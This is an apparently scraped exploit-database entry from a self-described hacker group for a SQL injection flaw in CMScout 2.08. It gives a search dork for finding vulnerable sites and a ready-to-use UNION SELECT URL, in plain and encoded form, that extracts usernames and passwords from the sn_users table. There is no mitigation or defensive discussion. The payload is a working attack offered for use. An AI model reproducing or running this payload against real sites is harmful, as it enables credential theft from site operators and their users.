58 lines
No EOL
2 KiB
Text
58 lines
No EOL
2 KiB
Text
# Title: CMScout 2.08 SQL Injection Vulnerability
|
|
# EDB-ID:
|
|
# CVE-ID: ()
|
|
# OSVDB-ID: ()
|
|
# Author: Dr.0rYX and Cr3w-DZ
|
|
# Published:
|
|
# Verified:
|
|
# Download Exploit Code
|
|
# Download N/A
|
|
|
|
NNNN NNNN AAAAAA SSSSSSSS TTTTTTTTTTTT
|
|
NNNNNN NNNN AAAAAA SSSSSSSSSSSS TTTTTTTTTTTT
|
|
NNNNNN NNNN AAAA AAAA SSSS TTTT eeeeee aaaaaa mmmm mm mmmm
|
|
NNNNNNNN NNNN AAAA AAAA SSSSSSSSSS TTTT eeee eeee aaaa aaaa mmmmmmmmmmmmmmmm
|
|
NNNN NNNNNNNN AAAA AAAA SSSSSSSS TTTT eeeeeeeeee aaaaaa mmmm mmmm mmmm
|
|
NNNN NNNNNN AAAAAAAAAAAAAA SSSS TTTT eeee aaaa aaaa mmmm mmmm mmmm
|
|
NNNN NNNNNN AAAAAAAAAAAAAA SSSSSSSSSSSS TTTT eeeeeeeeee aaaa aaaa mmmm mmmm mmmm
|
|
NNNN NNNN AAAA AAAA SSSSSSSS TTTT eeeeee aaaaaaaaaa mmmm mmmm mmmm
|
|
|
|
|
|
|
|
|
|
ALGERIAN HACKER
|
|
**********************- NORTH-AFRICA SECURITY TEAM -***********************
|
|
|
|
[!] Title : CMScout 2.08 SQL Injection Vulnerability
|
|
[!] Author : Dr.0rYX and Cr3w-DZ
|
|
[!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de
|
|
|
|
***************************************************************************/
|
|
|
|
[ Software Information ]
|
|
|
|
[+] Vendor : http://www.cmscout.za.net/
|
|
[+] script : CMScout 2.08
|
|
[+] Download : http://www.cmscout.co.za/index.php?page=downloads&menuid=9
|
|
[+] Vulnerability : php SQL injection
|
|
[+] Dork :Powered by CMScout (c)2005 CMScout Group
|
|
|
|
|
|
**************************************************************************/
|
|
[ Vulnerable File ]
|
|
|
|
http://server/index.php?page=photos&album=[N.A.S.T ]
|
|
|
|
[ Exploit ]
|
|
|
|
http://server/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat(uname,0x3a,passwd),3,4,5+from+sn_users--
|
|
|
|
|
|
|
|
[ Example ]
|
|
|
|
http://[site]/index.php?page=photos&album=-1+UNION+ALL+SELECT+1,concat%28uname,0x3a,passwd%29,3,4,5+from+sn_users--
|
|
|
|
[ Greets ]
|
|
|
|
[+] :CLAW , exploit-db.com,all my friends.... |